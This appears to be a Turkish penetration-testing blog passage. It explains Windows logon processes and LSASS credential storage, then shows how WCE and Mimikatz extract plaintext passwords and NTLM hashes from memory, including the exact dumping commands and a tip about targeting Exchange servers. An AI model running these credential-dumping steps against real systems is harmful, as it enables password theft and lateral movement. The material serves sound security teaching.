href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUMHYMbntvhaFOh4IgKC8MlVcGUV4llZlmC3xUFRKNTLgCgyYl7FExXdwUd0XZRhDXoz_W8_UUllX7pM9vnyajaTJMIA3-iEJRJNsT8UadjHKY_U7nomWZqqTTer3tiVFLC65ekQX8O3U/s1600/Wce%2526Mimikatz_11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUMHYMbntvhaFOh4IgKC8MlVcGUV4llZlmC3xUFRKNTLgCgyYl7FExXdwUd0XZRhDXoz_W8_UUllX7pM9vnyajaTJMIA3-iEJRJNsT8UadjHKY_U7nomWZqqTTer3tiVFLC65ekQX8O3U/s400/Wce%2526Mimikatz_11.png" width="400" /></a></div>SSP ve kimlik doğrulama paketleri ile ilgili ayrıntılı bilgi için bakınız:<br /><blockquote class="tr_bq"><a href="http://technet.microsoft.com/en-us/library/dn169026(v=ws.10).aspx" target="_blank"> http://technet.microsoft.com/en-us/library/dn169026(v=ws.10).aspx</a> <br /><a href="http://technet.microsoft.com/en-us/library/dn169016(v=ws.10).aspx" target="_blank"> http://technet.microsoft.com/en-us/library/dn169016(v=ws.10).aspx</a> <br /><a href="http://msdn.microsoft.com/en-us/library/aa374733(v=vs.85).aspx" target="_blank">http://msdn.microsoft.com/en-us/library/aa374733(v=vs.85).aspx </a> </blockquote><div style="text-align: justify;">Sonuç olarak belleğe yüklenen DLL, kendisine açık olarak gelen kimlik bilgilerini alır ve işler. Yerel bilgisayarda yerel bir hesap için kimlik doğrulama işleminde MSV1_0.dll, etki alanındaki bir bilgisayarda etki alanı hesabı için kimlik doğrulama işleminde ise kerberos.dll kütüphaneleri çağırılabildiği gibi, bir oturum kullanılarak başka sistemlerde de oturum açılması (Single Sign-on) belleğe yüklenen bu kütüphaneler kullanılarak gerçekleştirilir.</div><br /><div style="text-align: justify;">Kimlik doğrulama paketleri (authentication packages), bazı fonksiyonları kullanarak, parolayı (veya parolanın özetini) geri döndürülebilir olacak şekilde şifreli olarak saklamaktadır. Örneğin, standart Win32 fonksiyonlarından olan LsaProtectMemory fonksiyonunu kullanarak belirli bir adresten (Buffer) başlayarak belirli uzunluktaki (Buffer Size) bir bellek adres uzayını (memory address space)  şifrelerken, LsaUnProtectMemory fonksiyonu ise aldığı parametrelere göre şifre çözme işlemini gerçekleştirir. Şifreleme işleminde kullanılan anahtarlar, bilgisayar ilk olarak başlatıldığında LSASS prosesi içerisindeki fonksiyonlar tarafından üretilir. LsalnitializeProtectedMemory fonksiyonu bu anahtarı üreterek LsaEncryptMemory  fonksiyonunun kullanımına sunar. Şifrelenen veri, DLL’e göre, parola olabildiği gibi parolanın özeti de olabilir. Örneğin, MSV1_0.dll parolanın LM ve NTLM özet halinin şifresini saklamaktayken, wdigest.dll veya kerberos.dll ise parolanın kendisinin şifreli halini saklamaktadır. Böylece gerekli durumlarda (SSO gerektiren işlemler gibi) bu bilgiler, LSASS tarafından üretilen anahtar yardımı ile açık olarak elde edilebilmekte (parola veya parola özeti olarak) ve kimlik doğrulama işlemlerinde kullanılmaktadır.</div><br /><div style="text-align: justify;">Kimlik bilgilerinin bu şekilde (açık veya MSV1_0.dll için özet haline geri döndürülebilir olarak RAM üzerinde şifreli şekilde) saklandığı durumlardan bazıları aşağıdaki gibidir:</div><ul><li>Bilgisayar başında konsoldayken oturum açıldığında,</li><li>RDP ile uzak masaüstü bağlantısı yapıldığında,</li><li>RunAs komutu kullanarak bir işlem gerçekleştirildiğinde,</li><li>Belirli bir kullanıcı hakkı ile servis çalıştırıldığında, </li><li>Kimlik doğrulaması için tasarlanan mimarideki bazı API’leri kullanan uygulamalarla işlemler gerçekleştirildiğinde, vs.</li></ul><div style="text-align: justify;">Bu noktadan sonraki konular yazının kapsamı dışında olduğu için değinilmeyecektir. Aşağıdaki resim kimlik doğrulamanın sonraki aşamalar için fikir vermektedir.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNlt53hO2gWMJVTQ0WnoUiPHCpDEppHiwG85gG5BG-yiklPTjb7c7VqVzg0PizZsZFkFh6xnHHf897GTm_iNldwVqNMrzQO6V7MHciYh3b95rnc4rVebRUcVeR-LdnhjCAGeG9tNJiUoM/s1600/Wce%2526Mimikatz_12.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNlt53hO2gWMJVTQ0WnoUiPHCpDEppHiwG85gG5BG-yiklPTjb7c7VqVzg0PizZsZFkFh6xnHHf897GTm_iNldwVqNMrzQO6V7MHciYh3b95rnc4rVebRUcVeR-LdnhjCAGeG9tNJiUoM/s400/Wce%2526Mimikatz_12.gif" width="390" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Oturum açma işlemini bu yazı için tek bir cümleyle şu şekilde özetleyebiliriz: Oturum açmak için yazdığımız kullancı adı ve parola gibi bilgiler, belleğe (RAM) yüklenen ve kimlik doğrulama işleminde görev alan bazı kütüphane dosyalarında şifreli olarak saklanmakta ve bu bilgiler kimlik doğrulama işlemleri sırasında işlenmektedir. Aşağıdaki resim oturum açma işlemini özetlemektedir:</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDjX89ge1wXPaLN4cCwP2Sf-197NLNbgN5RKdUW31wodM94msJPP8HGGG56ZVIBn3pKlcSbfs0rVe5NJuWo7PBtLZcZ77VJXm36EJZKT93tlpnm6Hu-qMp-2kz9qrypaTozNMQY9nRnDY/s1600/Wce%2526Mimikatz_13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDjX89ge1wXPaLN4cCwP2Sf-197NLNbgN5RKdUW31wodM94msJPP8HGGG56ZVIBn3pKlcSbfs0rVe5NJuWo7PBtLZcZ77VJXm36EJZKT93tlpnm6Hu-qMp-2kz9qrypaTozNMQY9nRnDY/s400/Wce%2526Mimikatz_13.png" width="400" /></a></div><br /><br /><b>WCE ve Mimikatz Araçlarının Kullanımı</b><br /><b><br /></b><br /><div style="text-align: justify;">WCE ve Mimikatz araçları temel olarak RAM’de bulunan kimlik doğrulama paketlerindeki (authentication packages) kimlik bilgilerini (şifreli parola ve parola özetlerini, kullanıcı adı gibi) okur, parolayı (ve MSV1_0.dll için parola özetini) şifreleyen şifreleme anahtarını elde eder ve şifreli parola (ve parola özetini) elde eder.</div><div style="text-align: justify;">Bu araçları aşağıdaki bağlantıları kullanarak indirebilirsiniz:</div><ul><li>WCE:</li></ul><blockquote class="tr_bq"><a href="http://www.ampliasecurity.com/research/wcefaq.html#curversion" target="_blank"> http://www.ampliasecurity.com/research/wcefaq.html#curversion</a> </blockquote><ul><li>Mimikatz:</li></ul><blockquote class="tr_bq"><a href="http://blog.gentilkiwi.com/mimikatz" target="_blank"> http://blog.gentilkiwi.com/mimikatz</a> </blockquote><br />Bu araçları kullanarak oturumlardaki parolaları elde etmek şu şekilde gerçekleşir:<br /><ul><li>WCE:</li></ul><blockquote class="tr_bq">wce.exe -w</blockquote><ul><li>Mimikatz:</li></ul><blockquote class="tr_bq">mimikatz.exe</blockquote><blockquote class="tr_bq">privilege::debug</blockquote><blockquote class="tr_bq">sekurlsa::logonPasswords full</blockquote><br /><div style="text-align: justify;">Bu araçların kullanılması ile ilgili bir senorya şu şekildedir: SIRKET etki alanındaki bir bilgisayarda, “Kurban” adlı bir etki alanı kullanıcısı ve “Yerel Yonetici” adlı yerel kullanıcı oturum açık durumdadır. Bu senaryoda, RAM üzerinde bu iki kullanıcının oturum açma işlemi sırasında kullanılan kimlik doğrulama paketlerinden (authentication packages) parola bilgilerinin şifresi çözülerek alınabilir. Bu işlemlere ait ekran görüntüleri aşağıdaki gibidir.</div><ul><li>WCE aracı için:</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOFiEiyRRp9bx7A12YbCNfPcoIyiCesY-x3Et1cq3S4qecXjWWEj1NzqcYsSyo_lTen8nF1grgDbr9g2GJ6tQ-LQw6H9YyVDE9H9zNbXqT01RldVVe2BpjU2hfSNvcSGPcDNHtXe_14bw/s1600/Wce%2526Mimikatz_14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="65" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOFiEiyRRp9bx7A12YbCNfPcoIyiCesY-x3Et1cq3S4qecXjWWEj1NzqcYsSyo_lTen8nF1grgDbr9g2GJ6tQ-LQw6H9YyVDE9H9zNbXqT01RldVVe2BpjU2hfSNvcSGPcDNHtXe_14bw/s400/Wce%2526Mimikatz_14.png" width="400" /></a></div><br /><div style="text-align: justify;"><b>Not:</b> Bir bilgisayarın da parolası vardır. Ancak bu yazının kapsamı dışında olduğu için bu konuya girilmeyecektir.</div><ul><li>Mimikatz aracı için:</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfdPVlB0Ywa3MZGZEwzOWWKGnnPejWqRBGj3jV4wNxkDXiNNijTVIx2qpSsS0O97G5Cmfni8u_MXXRdjhNDwFYkCRl1Y8UZbsDBm9Qa-z4A3Wmutxdwi2NDc_pEIWD3oAtGBIES33AIHE/s1600/Wce%2526Mimikatz_15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfdPVlB0Ywa3MZGZEwzOWWKGnnPejWqRBGj3jV4wNxkDXiNNijTVIx2qpSsS0O97G5Cmfni8u_MXXRdjhNDwFYkCRl1Y8UZbsDBm9Qa-z4A3Wmutxdwi2NDc_pEIWD3oAtGBIES33AIHE/s400/Wce%2526Mimikatz_15.png" width="367" /></a></div><br /><div style="text-align: justify;">Yukarıdaki ekran görüntüsünde de görüldüğü gibi iki işlem gerçekleştirilir. Öncelikle yetkilendirme yapılır sonra da DLL enjeksiyonu ile istenen bilgiler elde edilir. Normalde bir kullanıcı sadece yetkisi olduğu bir proses üzerinde geniş yetkiye sahip olur, başka bir hesap (kullanıcı hasabı, servis hesabı ve SİSTEM hesabı dahil) tarafından oluşturulan bir proses üzerinde çok kısıtlı hakları bulunmaktadır. Eğer, SYSTEM kullanıcısının bir prosesine (LSASS.exe gibi) DLL enjeksiyonu gibi kritik bir işlem gerçekleştirilecekse, bu proses üzerinde SeDebugPrivilege yetkisine sahip olunmalıdır. Bu yetkiye sahip olunduktan sonra, sekurlsa.dll kütüphanesi LSASS.exe prosesine enjekte edilerek, yasal fonksiyonları (LsaUnProtectMemory, LsaEncryptMemory vs) kullanır ve kimlik doğrulama paketlerindeki parola bilgileri elde edilir.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Windows üzerinde çalıştırılan Mimikatz uygulamasının sonuçlarının kullanıcı adı ve parola formatında satır satır almak için aşağıdaki betik kullanılabilir:</div><blockquote class="tr_bq"><a href="https://github.com/agguvenligi/araclar/blob/master/parse_mimikatz_result.sh" target="_blank">https://github.com/agguvenligi/araclar/blob/master/parse_mimikatz_result.sh </a> </blockquote><div style="text-align: justify;"><b>Not:</b> Windows 7 sistemlerde varsayılan olarak disk üzerinde (SAM dosyasında) LM özetler tutulmamaktadır. Ancak RAM üzerinde bu bilgi bulunmaktadır. Yukarıdaki ekran görüntüsünde “Yerel Yonetici” adlı kullanıcının parolasının LM ve NTLM özetlerinin elde edildiği görülmektedir. WCE aracı kullanılarak da bu bilgi elde edilebilir:</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoN4oJpVFgTBeTuxR6CEvjBqhBQOxMlxZSuCsHibCmT7k4D7Fl21O9bojG0UMZww35z26aFho2j_Z2rZpOEDDjnA1drTxnaTqpjP8yq6OWQHWvQsVG7I1-Mkr3p4VdkT8TuRVTRcXUE4o/s1600/Wce%2526Mimikatz_16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="53" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoN4oJpVFgTBeTuxR6CEvjBqhBQOxMlxZSuCsHibCmT7k4D7Fl21O9bojG0UMZww35z26aFho2j_Z2rZpOEDDjnA1drTxnaTqpjP8yq6OWQHWvQsVG7I1-Mkr3p4VdkT8TuRVTRcXUE4o/s400/Wce%2526Mimikatz_16.png" width="400" /></a></div><br /><div style="text-align: justify;">Bir önceki başlıkta LSASS prosesinin adres uzayında kullanıcı parolasını (ve parolasının özetini) şifrelemek için kullanılan anahtar da bulunmakta olduğu belirtilmişti. Bu sebeple LSASS prosesinin dump’ı alınarak aynı mimaride farklı bir bilgisayara aktarılırsa, RAM üzerindeki bilgiler aktarılan makineden de alınabilir. Bu konu ile ilgili örnek bir yazı için bakınız:</div><blockquote class="tr_bq"><a href="http://www.agguvenligi.net/2013/10/procudmp-ve-mimikatz-ile-lsass-icerisinden-oturum-acan-kullanicilarin-parolalarini-elde-etme.html">http://www.agguvenligi.net/2013/10/procudmp-ve-mimikatz-ile-lsass-icerisinden-oturum-acan-kullanicilarin-parolalarini-elde-etme.html</a></blockquote><div style="text-align: justify;"><b>Not:</b> Bazı sistemler kimlik doğrulama işlemi gerçekleştirirken kimlik doğrulama paketlerinde kimlik bilgilerini saklarlar. Bu sistemlerden birisi de Exchange sunucularıdır. Bu sebeple, sızma testlerinde mimikatz uygulaması Exchange sunucularda çalıştırılırsa, tüm kullanıcıların parola bilgileri açık halde elde edilebilir.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Bu araçların RAM üzerindeki parolaların açık halde elde edebilmeleri haricinde daha bir çok kabiliyeti bulunmaktadır. Ancak diğer kabiliyetler bu yazının kapsamı dışında olduğu için değinilmemektedir. Bu araçların kullanımı için araçların indirildiği sayfalardaki bağlantılar ve aşağıdaki bağlantı sayfası kullanılabilir:</div><blockquote class="tr_bq"><a href="http://danielaelmi.altervista.org/password-cracking-hashes-dumping-brute-forcing-auditing-and-privileges-escalation/" target="_blank"> http://danielaelmi.altervista.org/password-cracking-hashes-dumping-brute-forcing-auditing-and-privileges-escalation/</a> </blockquote><br /><b>Kaynaklar: </b><br /><b><br /></b><a href="http://www.bilgiguvenligi.gov.tr/microsoft-guvenligi/windows-isletim-sisteminde-oturum-acma-islemi-winlogon.html" target="_blank"> http://www.bilgiguvenligi.gov.tr/microsoft-guvenligi/windows-isletim-sisteminde-oturum-acma-islemi-winlogon.html </a> <br /><a href="http://msdn.microsoft.com/tr-tr/magazine/cc163489(en-us).aspx" target="_blank"> http://msdn.microsoft.com/tr-tr/magazine/cc163489(en-us).aspx </a> <br /><a href="http://technet.microsoft.com/en-us/library/ff404303(v=ws.10).aspx" target="_blank"> http://technet.microsoft.com/en-us/library/ff404303(v=ws.10).aspx </a> <br /><a href="http://blog.bga.com.tr/2013/01/mimikatz-ile-windows-sistemlerde.html" target="_blank"> http://blog.bga.com.tr/2013/01/mimikatz-ile-windows-sistemlerde.html</a><br /><a href="http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html" target="_blank"> http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html </a> <br /><a href="http://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx" target="_blank"> http://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx </a> <br /><a href="http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf" target="_blank"> http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf </a> <br /><a href="http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf" target="_blank"> http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf </a> <br /><a href="http://codeidol.com/community/windows/logon/25019/" target="_blank">http://codeidol.com/community/windows/logon/25019/</a><br /><a href="http://fr.slideshare.net/gentilkiwi/mimikatz-asfws" target="_blank"> http://fr.slideshare.net/gentilkiwi/mimikatz-asfws </a> <br /><a href="http://danielaelmi.altervista.org/password-cracking-hashes-dumping-brute-forcing-auditing-and-privileges-escalation/" target="_blank"> http://danielaelmi.altervista.org/password-cracking-hashes-dumping-brute-forcing-auditing-and-privileges-escalation/ </a> <br /><a href="http://www.blackhat.com/presentations/bh-dc-09/Muckin/BlackHat-DC-09-Muckin-vista-security-internals.pdf" target="_blank"> http://www.blackhat.com/presentations/bh-dc-09/Muckin/BlackHat-DC-09-Muckin-vista-security-internals.pdf</a>

WCE ve Mimikatz Kullanarak Windows Oturum Parolalarının Açık Halde Elde Edilmesi #2

Bir önceki yazıda Windows işletim sisteminde oturum açma sırasında görevli olan prosesler ve bu proseslerin işlevlerinden konumuz dahilinde...

Read more »

WCE ve Mimikatz Kullanarak Windows Oturum Parolalarının Açık Halde Elde Edilmesi #1

<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM1ROS1uIob052Dn1Fb7At1dtjJhXZAbHVHcK7hplFaskGK4zHYX84NFkqIX5FJzFQoHzypJ19mBo9S4Mzld5Lxz_Q4K0RGG-U74g68UoukvSll2u-kCFfkKzBNCc3NcnSCE4vJAwzuxOy/s1600/103.jpg" imageanchor="1" style="clear: left; display: inline !important; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="184" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiM1ROS1uIob052Dn1Fb7At1dtjJhXZAbHVHcK7hplFaskGK4zHYX84NFkqIX5FJzFQoHzypJ19mBo9S4Mzld5Lxz_Q4K0RGG-U74g68UoukvSll2u-kCFfkKzBNCc3NcnSCE4vJAwzuxOy/s320/103.jpg" width="320" /></a><br /><div style="text-align: justify;">Etki alanı sızma testlerinde ele geçirilen bir bilgisayardan diğer bilgisayarlara yayılma işlemlerinde PTH (Pass-The-Hash) adı verilen yöntem kullanılır. Bu yöntemde bir bilgisayarın diskinden (SAM dosyasından) alınan yerel yönetici parolasının özeti kullanılarak (psexec aracıyla veya başka tekniklerle) diğer bilgisayarlarda oturum açılmaya çalışılır. Ancak bazı durumlarda parolanın özeti yeterli olmayabilmektedir. Örneğin, etki alanı parolası ile entegre bir başka sisteme (Outlook web maile, VPN sistemlerine, vs.) bağlanılmaya çalışıldığında parola özeti yetersiz kalabilmektedir. Bu durumlarda parolanın kendisi (açık hali - plaintext) gerekmektedir.</div><div style="text-align: justify;"></div><br /><div style="text-align: justify;">Windows işletim sisteminde açılan bir oturumda oturum süresi boyunca kullanıcıların bazı bilgileri bellek (RAM) üzerinde saklanmaktadır. Bu bilgilerden birisi de parolanın açık halidir. Parolanın bellekten açık olarak elde edilmesi, ikişer başlık halinde iki yazı olarak işlenecektir.</div><ul><li style="text-align: justify;">Birinci yazının ilk başlığında, oturum açma işlemi sırasında önemli rol tutan prosesleri incelenecektir. İkinci başlığında ise, oturum açma işleminin Winlogon prosesine bakan ayağı işlenecektir. Böylece kimlik bilgilerini yazan bir kullanıcının bilgilerinin LSASS prosesine gelene kadarki durumu incelenecektir.</li><li style="text-align: justify;">İkinci yazının ilk başlığında kullanıcı kimlik bilgilerinin LSASS tarafından alınması ve sadece parolanın işlenmesi konusuna değinilecektir. İkinci başlıkta ise, oturumlardaki parolaları açık olarak elde eden 2 aracın (WCE ve Mimikatz) çalışma prensiplerinden ve kullanımından bahsedilecektir. </li></ul><b>Windows İşletim Sisteminde Oturum Açma İşlemi İle İlgili Prosesler</b><br /><div style="text-align: justify;">Windows işletim sisteminde çalışan bir proses çekirdek modu (kernel mode) ve kullanıcı modu (user mode) olmak üzere iki farklı modda çalışabilir. Çekirdek modunda işletim sistemi bileşenleri çalışırken, uygulamalar kullanıcı modunda çalışır. İşletim sistemi bileşenleri yüklendikten sonra, kullanıcı modu ve etkileşimli oturum açma (interactive logon) işlemi başlayabilmektedir.</div><br /><div style="text-align: justify;">Kullanıcıya ait bu modda çalışan ilk proses <b>Smss.exe</b> prosesidir. Ana Smss prosesi her zaman sıfır numaralı etkileşimsiz oturumda bulunur ve başlatılacak olan her bir etkileşimli oturum için bir adet kopya Smss prosesi oluşturur. Oluşturulan kopya Smss prosesi ilgili oturuma ait Csrss ve Winlogon proseslerini oluşturup kendi çalışmasını sonlandırır. Şekil-1'de gösterildiği gibi PID değeri 368 olan Smss kendisinin iki kopyasını oluşturmuştur. 488 ve 624 PID değerlerine sahip olan kopya Smss prosesleri başka prosesleri oluşturduktan sonra sonlanmıştır. Prosesler arasındaki bu ilişki aşağıdaki ekran görüntüsünde görülmektedir:</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3npOyow0QKwYk6ejBec2URw7IHBulXx7fN2njAmUf3V4-YyDnSu1o119m2Kg-rgblyjnp9l6ukgZ20Voc25imkadSCnQt5k1RqqReP-0pO7onMFK1ZyRQc4PRcWvMuAXvGqRWQnJOaPg/s1600/Wce&Mimikatz_01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3npOyow0QKwYk6ejBec2URw7IHBulXx7fN2njAmUf3V4-YyDnSu1o119m2Kg-rgblyjnp9l6ukgZ20Voc25imkadSCnQt5k1RqqReP-0pO7onMFK1ZyRQc4PRcWvMuAXvGqRWQnJOaPg/s400/Wce&Mimikatz_01.jpg" width="400" /></a></div><br />Oturum işlemleri ile ilgili en önemli prosesler aşağıdaki gibidir:<br /><ul><li style="text-align: justify;"><b>Smss.exe (Session Manager Subsystem):</b> Windows işletim sisteminin başlangıç prosesidir. Çevresel değişkenlerin oluşturulması, belirli (HKLM\System\CurrentControlSet\Control\Session Manager\SubSystems altında belirtilen) alt sistemlerin başlatılması, bir takım proseslerin (csrss, wininit, winlogon) başlatılması en temel görevlerindendir.</li><li style="text-align: justify;"><b>Csrss.exe (Client/Server Runtime Subsystem): </b>Thread ve Win32 konsolunun (metinsel arayüz, API kullanımı ile kullanıcı dostu arayüze sahip olunabilir) kontrolünden sorumlu olan prosestir. Temel olarak, kullanıcı modunda gerçekleşen bir çok görevin (task), çekirdek moduna erişmemesini (sistem çağrısının gerçekleştirilmemesini) sağlar.</li><li style="text-align: justify;"><b>Winlogon.exe:</b> İşletim sisteminde oturum açılması ve kapatılması, LogonUI prosesinin oluşturulması, beklenmedik bir şekilde sonlanan LogonUI prosesinin yeniden başlatılması, kimlik doğrulama işlemi için LSASS prosesinin çağırılması, kullanıcı şifresinin değiştirmesi, iş istasyonunun (workstation) kilitlenmesi ve kilitli olan iş istasyonunun tekrardan açılması gibi işlemlerden sorumludur. Winlogon bu görevleri yerine getirirken, yetkisi olmayan başka bir prosesin bu işlemleri okuyamaması, değiştirememesi, kısaca araya girememesini sağlar. Winlogon SYSTEM haklarıyla çalışır, bu sebeple sıfır numaralı oturumda çalışmamaktadır. Windows ortamında etkileşimli her bir oturum için bir adet Winlogon oluşturulur. Sonraki başlıkta biraz daha detaya girilecektir.</li><li style="text-align: justify;"><b>LogonUI.exe:</b> Kimlik bilgisi sağlayıcılarının (credential provider) yüklenmesinden ve oturum değişimi (açma ve kapama işlemleri sırasında) Windows etkileşimli oturum açma grafik arayüzünün gösterilmesinden sorumlu prosestir. Sonraki başlıkta biraz daha detaya girilecektir.</li><li style="text-align: justify;"><b>LSASS.EXE (Local Security Authority Subsystem Service):</b> Kullanıcıların oturum açma işlemleri sırasında kimlik bilgilerini doğruluyan, parola değişikliklerinin gerçekleştirilmesinde görevli olan, kullanıcının yerel güvenlik ilkelerine (security policy) uymaya zorlayan, kullanıcı haklarına göre token oluşturan, göreviyle ilişkili bir olay olduğunda bu olayı Olay Günlüklerine (Event Viewer) yazan prosestir. </li></ul><b>Winlogon ve Windows İşletim Sisteminde Oturum Açma İşlemi</b><br /><div style="text-align: justify;">Windows Vista işletim sistemi öncesinde (Windows XP, Windows Server 2003 gibi), her etkileşimli oturum için Winlogon prosesinin bir örneğini oluşturulurdu. Winlogon prosesi RAM üzerinde kendisine belli bir yer ayırmaktadır. Winlogon, bu yere GINA (Graphical Identification and Authentication) adı verilen DLL (dynamic-link library)’i yüklerdi. GINA da etkileşimli oturumda kimlik doğrulama işlemini gerçekleştirirdi.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHxnto5ZJRJfz7V75MIi9MeElJ0-gn8VN_ASQee8IuUsrFeHa9ZKrVpWig8rkSieWLM7Llqm88sMB17-poVmkMXg2uiyTO9vTeWTkmREyuzVEYkBSkDOtjn-rdqGYsZ4SXDfZtJ75HbkU/s1600/Wce%2526Mimikatz_02.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHxnto5ZJRJfz7V75MIi9MeElJ0-gn8VN_ASQee8IuUsrFeHa9ZKrVpWig8rkSieWLM7Llqm88sMB17-poVmkMXg2uiyTO9vTeWTkmREyuzVEYkBSkDOtjn-rdqGYsZ4SXDfZtJ75HbkU/s400/Wce%2526Mimikatz_02.gif" width="400" /></a></div><br /><div style="text-align: justify;">Ancak, bu (eski) mimaride Winlogon sıfırıncı (0.) oturumda çalışırdı. Yani kullanıcının açtığı oturum, sistem servislerinin ve kritik diğer proseslerin çalıştığı oturumla aynı oturumda işlem görmekteydi. Ayrıca kullanıcıdan hesap bilgilerini isteyen arayüz 3. taraf bir bileşen olarak kullanılmaktaydı.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDlhx-njtCBykNuJN_oCyDF-1MAR2K2UBUuYwWB_Ks6yAzk2yFoHP_ae8BDOvi37kLcsS9yOH2b6onx8S_UEZqGcRVF59ggzHo26pCrITF6jXJbHa-n6rVSz6nrFOMjpTVim-ea8l4rME/s1600/Wce%2526Mimikatz_03.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="371" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDlhx-njtCBykNuJN_oCyDF-1MAR2K2UBUuYwWB_Ks6yAzk2yFoHP_ae8BDOvi37kLcsS9yOH2b6onx8S_UEZqGcRVF59ggzHo26pCrITF6jXJbHa-n6rVSz6nrFOMjpTVim-ea8l4rME/s400/Wce%2526Mimikatz_03.gif" width="400" /></a></div><br /><div style="text-align: justify;">Windows Vista işletim sistemi ve sonrasında (Windows 7/8, Windows Server 2008/2008 R2/2012 gibi) oturum açma mimarisi oldukça değişiklik göstermiştir. Yeni mimaride de her oturum için Winlogon prosesinin bir örneği oluşturulur. Ancak bu (yeni) mimaride, etkileşimli oturum direk olarak sıfırıncı (0.) oturumda işlem görmemektedir.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDqW3WHifXPu2zTcNbN692Mq0eI6BhPvmhNnrY8DpJg9sVhUQbxTxDiG1f6h6t-RzJpnB9U_OFzvZX_SOG67K6vT_jY9D6IrSVfvRMmDfuovWSqxiK4wjfeN1E0EAImofZi5j4XL2e6LI/s1600/Wce%2526Mimikatz_04.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="234" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDqW3WHifXPu2zTcNbN692Mq0eI6BhPvmhNnrY8DpJg9sVhUQbxTxDiG1f6h6t-RzJpnB9U_OFzvZX_SOG67K6vT_jY9D6IrSVfvRMmDfuovWSqxiK4wjfeN1E0EAImofZi5j4XL2e6LI/s400/Wce%2526Mimikatz_04.gif" width="400" /></a></div><br /><div style="text-align: justify;">Bu mimari ile sistem ve kullanıcı prosesleri farklı oturumlarda işlem görmeye başlamış, çekirdek için Ram üzerinde ayrılan alana kullanıcı proseslerinin direk erişimi oldukça kısıtlanmıştır.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG9CCaiM7SYfeNEyXLxBdBybPpb_M2b_bqQD7djxHQAuNz32YikFcjUaXHx8OUeourLrdYX6-eAphBt8J_TQ7z_BEIhfT2857j-B-LFa_RedLTurpzWbfVELpye7XC5ImpPZSLMB4fJc4/s1600/Wce%2526Mimikatz_05.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG9CCaiM7SYfeNEyXLxBdBybPpb_M2b_bqQD7djxHQAuNz32YikFcjUaXHx8OUeourLrdYX6-eAphBt8J_TQ7z_BEIhfT2857j-B-LFa_RedLTurpzWbfVELpye7XC5ImpPZSLMB4fJc4/s400/Wce%2526Mimikatz_05.gif" width="400" /></a></div><br /><div style="text-align: justify;">Yeni mimarideki önemli ikinci değişiklik ise, GINA yerine işletim sistemine gömülü (built-in) olarak gelen ve Winlogon tarafından oluşturulan LogonUI prosesidir. Yani, Winlogon prosesinin bellek alanında DLL kullanılması yerine ayrı bir proses oluşturulmuştur. Aşağıdaki ekran görüntüsü bir numaralı oturum açıkken alınmıştır. Birinci kullanıcı ilk oturum ile etkileşim içerisinde olduğundan dolayı LogonUI prosesinin çalışması sona ermiştir. İki, üç ve dört numaralı kullancııların açtığı iki, üç ve dört numaralı oturumlar açık olmasına rağmen 